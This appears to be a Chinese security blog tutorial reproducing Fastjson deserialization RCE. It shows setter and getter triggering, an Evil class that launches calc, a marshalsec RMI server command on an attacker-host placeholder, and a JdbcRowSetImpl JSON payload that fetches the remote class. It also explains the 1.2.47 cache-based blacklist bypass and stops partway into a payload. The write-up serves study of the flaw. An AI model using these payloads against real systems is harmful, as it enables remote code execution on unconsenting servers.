<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> void</span><span style="color:#59873A;--shiki-dark:#80A665"> setAge</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#AB5959;--shiki-dark:#CB7676">int</span><span style="color:#B07D48;--shiki-dark:#BD976A"> age</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#A65E2B;--shiki-dark:#C99076">        this</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">age</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> age</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">        System</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">out</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">println</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">setAge</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    public</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> String </span><span style="color:#59873A;--shiki-dark:#80A665">getSex</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">        System</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">out</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">println</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">getSex</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">        return</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> sex</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> void</span><span style="color:#59873A;--shiki-dark:#80A665"> setSex</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">String </span><span style="color:#B07D48;--shiki-dark:#BD976A">sex</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#A65E2B;--shiki-dark:#C99076">        this</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">sex</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> sex</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">        System</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">out</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">println</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">setSex</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span></span></code></pre>
<h3 id="13-编写mainjava测试类"><a class="anchor" href="#13-编写mainjava测试类">#</a> 1.3 编写Main.java测试类</h3>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-java"><span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">package</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> com</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">example</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> com</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">alibaba</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">fastjson</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">JSON</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> com</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">alibaba</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">fastjson</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">JSONObject</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> class</span><span style="color:#2E8F82;--shiki-dark:#5DA994"> Main</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> static</span><span style="color:#AB5959;--shiki-dark:#CB7676"> void</span><span style="color:#59873A;--shiki-dark:#80A665"> main</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#AB5959;--shiki-dark:#CB7676">String</span><span style="color:#a65e2b;--shiki-dark:#d4976c">[</span><span style="color:#a65e2b;--shiki-dark:#d4976c">]</span><span style="color:#B07D48;--shiki-dark:#BD976A"> args</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">        String</span><span style="color:#B07D48;--shiki-dark:#BD976A"> Test</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> "</span><span style="color:#B56959;--shiki-dark:#C98A7D">{</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">@type</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">:</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">com.example.User</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#AB5959;--shiki-dark:#CB7676"> +</span></span>
<span class="line"><span style="color:#B5695977;--shiki-dark:#C98A7D77">                "</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">name</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">:</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">张三</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#AB5959;--shiki-dark:#CB7676"> +</span></span>
<span class="line"><span style="color:#B5695977;--shiki-dark:#C98A7D77">                "</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">age</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">:18}</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">        JSONObject</span><span style="color:#B07D48;--shiki-dark:#BD976A"> date</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#B07D48;--shiki-dark:#BD976A"> JSON</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">parseObject</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">Test</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">        System</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">out</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">println</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">date</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span></span></code></pre>
<p>运行结果如下：</p>
<p><img loading="lazy" src="https://cdn.nlark.com/yuque/0/2026/png/39222866/1774691509826-70db82f1-eabf-42ec-ba7f-5ce072376e8d.png" alt="" /></p>
<p>我们可以看到</p>
<p>@type 指向了我们自己创建的类文件</p>
<p>JSON 数据中包含了name和age两个参数</p>
<p>虽然没有定义Sex参数，但还是触发了getSex</p>
<h3 id="14-parseobject-两种调用方式的本质区别"><a class="anchor" href="#14-parseobject-两种调用方式的本质区别">#</a> 1.4 parseObject 两种调用方式的本质区别</h3>
<p>我们可以看到上面的例子，我们使用的是</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-java"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">JSONObject</span><span style="color:#B07D48;--shiki-dark:#BD976A"> date</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#B07D48;--shiki-dark:#BD976A"> JSON</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">parseObject</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">Test</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span></code></pre>
<p>如果我们换成，我们来看下效果</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-java"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">User</span><span style="color:#B07D48;--shiki-dark:#BD976A"> user</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#B07D48;--shiki-dark:#BD976A"> JSON</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">parseObject</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">test</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A"> User</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">class</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span></code></pre>
<p>即</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-java"><span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">package</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> com</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">example</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> com</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">alibaba</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">fastjson</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">JSON</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">import</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> com</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">alibaba</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">fastjson</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">JSONObject</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> class</span><span style="color:#2E8F82;--shiki-dark:#5DA994"> Main</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> static</span><span style="color:#AB5959;--shiki-dark:#CB7676"> void</span><span style="color:#59873A;--shiki-dark:#80A665"> main</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#AB5959;--shiki-dark:#CB7676">String</span><span style="color:#a65e2b;--shiki-dark:#d4976c">[</span><span style="color:#a65e2b;--shiki-dark:#d4976c">]</span><span style="color:#B07D48;--shiki-dark:#BD976A"> args</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">        String</span><span style="color:#B07D48;--shiki-dark:#BD976A"> Test</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> "</span><span style="color:#B56959;--shiki-dark:#C98A7D">{</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">@type</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">:</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">com.example.User</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#AB5959;--shiki-dark:#CB7676"> +</span></span>
<span class="line"><span style="color:#B5695977;--shiki-dark:#C98A7D77">                "</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">name</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">:</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">world</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">,</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#AB5959;--shiki-dark:#CB7676"> +</span></span>
<span class="line"><span style="color:#B5695977;--shiki-dark:#C98A7D77">                "</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">age</span><span style="color:#A65E2B;--shiki-dark:#C99076">\"</span><span style="color:#B56959;--shiki-dark:#C98A7D">:18}</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">        User</span><span style="color:#B07D48;--shiki-dark:#BD976A"> user</span><span style="color:#999999;--shiki-dark:#666666"> =</span><span style="color:#B07D48;--shiki-dark:#BD976A"> JSON</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">parseObject</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">Test</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#B07D48;--shiki-dark:#BD976A"> User</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">class</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">        System</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">out</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">println</span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">user</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span></span></code></pre>
<p><img loading="lazy" src="https://cdn.nlark.com/yuque/0/2026/png/39222866/1774691873438-01ee36d1-cd98-4f86-a6ae-18f7bb66c2ba.png" alt="" /></p>
<p>此时我们可以看到，该方式没有触发任何的getter方法，只触发了setter方法</p>
<table>
<thead>
<tr>
<th><code>调用方式</code></th>
<th>触发方式</th>
<th>返回类型</th>
</tr>
</thead>
<tbody>
<tr>
<td>JSON.pareObject(类文件名字)</td>
<td>setter + getter</td>
<td>JSONObject</td>
</tr>
<tr>
<td>JSON.pareObject(类文件名字,类文件名.calss)</td>
<td>setter</td>
<td>User对象</td>
</tr>
</tbody>
</table>
<h2 id="二-漏洞复现"><a class="anchor" href="#二-漏洞复现">#</a> 二、漏洞复现</h2>
<p>我们需要先写一个恶意类文件，功能为弹出计算器</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-java"><span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> class</span><span style="color:#2E8F82;--shiki-dark:#5DA994"> Evil</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    public</span><span style="color:#59873A;--shiki-dark:#80A665"> Evil</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#1E754F;--shiki-dark:#4D9375">        try</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#a65e2b;--shiki-dark:#d4976c">{</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">            Runtime</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">getRuntime</span><span style="color:#a13865;--shiki-dark:#d9739f">(</span><span style="color:#a13865;--shiki-dark:#d9739f">)</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">exec</span><span style="color:#a13865;--shiki-dark:#d9739f">(</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">calc</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#a13865;--shiki-dark:#d9739f">)</span><span style="color:#999999;--shiki-dark:#666666">;</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">        </span><span style="color:#a65e2b;--shiki-dark:#d4976c">}</span><span style="color:#1E754F;--shiki-dark:#4D9375"> catch</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#a65e2b;--shiki-dark:#d4976c">(</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE">Exception </span><span style="color:#B07D48;--shiki-dark:#BD976A">e</span><span style="color:#a65e2b;--shiki-dark:#d4976c">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#a65e2b;--shiki-dark:#d4976c">{</span></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BD976A">            e</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#59873A;--shiki-dark:#80A665">printStackTrace</span><span style="color:#a13865;--shiki-dark:#d9739f">(</span><span style="color:#a13865;--shiki-dark:#d9739f">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">        </span><span style="color:#a65e2b;--shiki-dark:#d4976c">}</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">    public</span><span style="color:#AB5959;--shiki-dark:#CB7676"> static</span><span style="color:#AB5959;--shiki-dark:#CB7676"> void</span><span style="color:#59873A;--shiki-dark:#80A665"> main</span><span style="color:#1e754f;--shiki-dark:#4d9375">(</span><span style="color:#AB5959;--shiki-dark:#CB7676">String</span><span style="color:#a65e2b;--shiki-dark:#d4976c">[</span><span style="color:#a65e2b;--shiki-dark:#d4976c">]</span><span style="color:#B07D48;--shiki-dark:#BD976A"> args</span><span style="color:#1e754f;--shiki-dark:#4d9375">)</span><span style="color:#999999;--shiki-dark:#666666"> </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">    </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span></span>
<span class="line"><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span></span>
<span class="line"></span></code></pre>
<p>随后，我们将java文件进行编译 注(最好还是使用低版本的jdk来进行编译，以确保兼容性)</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-java"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">javac </span><span style="color:#B07D48;--shiki-dark:#BD976A">Evil</span><span style="color:#999999;--shiki-dark:#666666">.</span><span style="color:#B07D48;--shiki-dark:#BD976A">java</span></span>
<span class="line"></span></code></pre>
<p>我们将该恶意类文件上传至云服务器,本地演示也没问题。</p>
<p>同时我们在云服务器上打开rmi服务，使靶机可以远程下载调用我们的恶意</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-shell"><span class="line"><span style="color:#59873A;--shiki-dark:#80A665">java</span><span style="color:#A65E2B;--shiki-dark:#C99076"> -cp</span><span style="color:#B56959;--shiki-dark:#C98A7D"> marshalsec-0.0.3-SNAPSHOT-all.jar</span><span style="color:#B56959;--shiki-dark:#C98A7D"> marshalsec.jndi.RMIRefServer</span><span style="color:#B5695977;--shiki-dark:#C98A7D77"> "</span><span style="color:#B56959;--shiki-dark:#C98A7D">http://攻击机IP:端口/#Evil</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#2F798A;--shiki-dark:#4C9A91"> 9999</span></span>
<span class="line"></span></code></pre>
<p>出现* Opening JRMP listener on 9999即说明成功开启(注意:如果上传至云服务器时，记得开启端口;若在本地可以使用python简单搭建一个服务用来下载)</p>
<p><img loading="lazy" src="https://cdn.nlark.com/yuque/0/2026/png/39222866/1774692662801-b5952536-21cc-49df-9585-89a9307e7d6f.png" alt="" /></p>
<p>此时我们修改测试类的payload，来实现RCE</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-plain"><span class="line"><span>{</span></span>
<span class="line"><span>    "@type" : "com.sun.rowset.JdbcRowSetImpl",</span></span>
<span class="line"><span>    "dataSourceName" : "rmi://攻击机IP:9999/Evil",</span></span>
<span class="line"><span>    "autoCommit" : true</span></span>
<span class="line"><span>}</span></span>
<span class="line"><span></span></span></code></pre>
<p>成功实现弹窗</p>
<p><img loading="lazy" src="https://cdn.nlark.com/yuque/0/2026/png/39222866/1774692957916-52cfd1ea-8b9d-4338-a17b-53daf149e646.png" alt="" /></p>
<h1 id="官方前期维护方法"><a class="anchor" href="#官方前期维护方法">#</a> 官方前期维护方法</h1>
<p>而官方对于该漏洞的更新一开始则是使用黑名单来对抗，但众所周知，黑名单是容易被绕过的。</p>
<p>所以在1.2.47以前，攻击者与官方维护一直处于一个添加黑名单-&gt;被绕过-&gt;再完善黑名单-&gt;再次绕过的一个循环里。Fastjson维护了一个“危险类列表”（如com.sun.rowset.JdbcRowSetImpl）,如果json中的@type指定了这些类，则会直接抛出异常</p>
<p>而在1.2.47版本时，官方将黑名单日益完善，并且默认关闭了AutoType。他们认为攻击者无法绕过黑名单的检测。但是，该版本出现了一个核心的逻辑缺陷：利用全局缓存机制绕过黑名单</p>
<h1 id="fastjson-1247反序列化漏洞全局缓存"><a class="anchor" href="#fastjson-1247反序列化漏洞全局缓存">#</a> Fastjson 1.2.47反序列化漏洞(全局缓存)</h1>
<p>漏洞利用流程（缓存污染）</p>
<p>攻击者发现，即使 AutoType 关闭，Fastjson 在加载类时也会先查缓存。如果缓存里有，就直接用，不再检查黑名单。</p>
<p>攻击者利用这个特性，分两步走即可绕过黑名单校验：</p>
<h2 id="环境搭建"><a class="anchor" href="#环境搭建">#</a> 环境搭建</h2>
<p>可参考</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-latex"><span class="line"><span style="color:#393A34;--shiki-dark:#DBD7CAEE">https://www.freebuf.com/vuls/352191.html</span></span>
<span class="line"></span></code></pre>
<h2 id="漏洞复现"><a class="anchor" href="#漏洞复现">#</a> 漏洞复现</h2>
<p>我们主要来讲一下payload的变化</p>
<p>倘若我们还使用原来的payload来尝试一下</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-json"><span class="line"><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#99841877;--shiki-dark:#B8A96577">  "</span><span style="color:#998418;--shiki-dark:#B8A965">x</span><span style="color:#99841877;--shiki-dark:#B8A96577">"</span><span style="color:#999999;--shiki-dark:#666666">:</span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">  </span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
